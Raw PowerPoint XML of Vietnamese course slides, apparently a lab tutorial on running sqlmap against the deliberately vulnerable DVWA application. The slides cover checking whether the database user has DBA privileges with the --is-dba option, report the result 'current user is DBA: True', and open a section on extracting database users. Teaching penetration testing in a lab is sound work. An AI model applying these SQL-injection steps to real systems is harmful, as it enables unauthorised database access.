              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED921E62-31C8-8135-24BD-5DBD35746086}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="14909" y="1294340"/>
            <a:ext cx="9114182" cy="3871393"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19549523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64011-13A2-F6CE-C515-17A781DD9C1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5998AC5-6D9B-11C5-7DB8-FB94411F14E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528794C1-E714-7D87-F17F-EA8E39D94C0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133</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A90CB8C-871A-5308-62FF-C533C8D457D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="211888"/>
            <a:ext cx="8915400" cy="113107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Kiểm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>tra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>quyền</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>hạn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>tài</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>khoản</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>:</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Trên Terminal chạy lệnh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="3000" b="1" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61855366-A478-51EB-DCAE-394730C0C55D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="69638" y="1558924"/>
            <a:ext cx="8896138" cy="1743075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20786682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F0AAC-6831-6364-925D-3DC69E9046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A38E504-A5A4-8FF2-EE47-CB7B76DC1ED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8686842-CC32-11A9-8B11-E5DF1102679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134</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39461185-6428-E3D2-783E-E9FD12F2338C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="211888"/>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Tham </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>số</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> --is-dba </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>yêu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>cầu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>thực</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>hiện</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>truy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>vấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>để</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>kiểm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>tra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>xem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>hiện</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>tại</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>có</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>đặc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>quyền</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> DBA hay </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>không</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="3000" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9606169-55CE-F8BF-8BD4-4C06F844B2D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1885950" y="1409700"/>
            <a:ext cx="6553200" cy="4844798"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39679960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18597-6FB3-5B85-8D5F-0B1EA078292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8C6DFB7-2425-44F0-CE93-A731C92039D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2290C62E-CC83-3748-922F-AA79BACCE76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135</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{794E1E59-8DF4-20E6-9494-EF9C184E8AC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="211888"/>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Sau </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>khi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>xử</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>lý</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>vấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>đề</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> cookie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>và</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>phiên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>làm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>việc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>đã</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>trả</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>về</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>kết</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>quả</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> "current user is DBA: True”</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="3000" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B16A15C-FCAA-4068-9D5E-8BC6B506FAC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2895600" y="1517663"/>
            <a:ext cx="6383577" cy="4057614"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FF08328-E19D-F691-C770-91DF514EDBE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="1435127"/>
            <a:ext cx="2514600" cy="3323987"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="MS Mincho" panose="02020609040205080304" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>Kết </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="MS Mincho" panose="02020609040205080304" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>quả</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này</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khẳng</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định</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tài</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khoản</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="MS Mincho" panose="02020609040205080304" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t> MySQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="MS Mincho" panose="02020609040205080304" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>đang</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chạy</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ứng</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dụng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="MS Mincho" panose="02020609040205080304" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t> DVWA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="MS Mincho" panose="02020609040205080304" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>có</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đặc</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quyền</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rất</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="MS Mincho" panose="02020609040205080304" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="MS Mincho" panose="02020609040205080304" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>cao</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="MS Mincho" panose="02020609040205080304" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9621024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BF69-D008-0B0D-4A9C-6A23780237D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B2A7C22-640A-4385-C6A2-EB46DB85C95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232E3BB9-5819-27EC-9B0B-9ECF66B0E2C3}"/>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136</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B77391D-79D1-3D87-ADCB-0BACEAF4B031}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="211888"/>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Trích xuất người dùng Database</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
